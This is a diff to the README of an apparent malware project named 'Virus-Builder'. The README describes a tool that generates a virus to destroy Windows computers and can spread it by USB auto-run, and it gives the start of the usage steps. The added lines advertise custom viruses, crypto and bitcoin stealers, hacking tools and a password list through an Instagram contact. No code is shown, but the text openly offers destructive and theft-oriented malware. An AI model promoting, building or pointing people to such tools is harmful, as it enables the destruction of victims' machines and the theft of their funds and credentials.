Cyber-Dioxide/Virus-Builder/README.md

 # Virus-Builder
 This tool will generate a virus that can only destroy Windows computer.
 You can also configure to auto run in usb drive More scripts will be added with time
+# Service
+* To get your custom virus, crypto stealer, bitcoin stealer then dm me on instagram @coding_memz
+* To get your own custom hacking tool, dm me on instagram @coding_memz
+* Get the 14M passwords list containing worlds mostly used passwords, dm me on instagram @coding_memz.
+* Get the worlds best hacking course, dm me on instagram @coding_memz
 # Usage
 1. git clone https://github.com/Cyber-Dioxide/Virus-Builder/
 2. cd Virus-Builder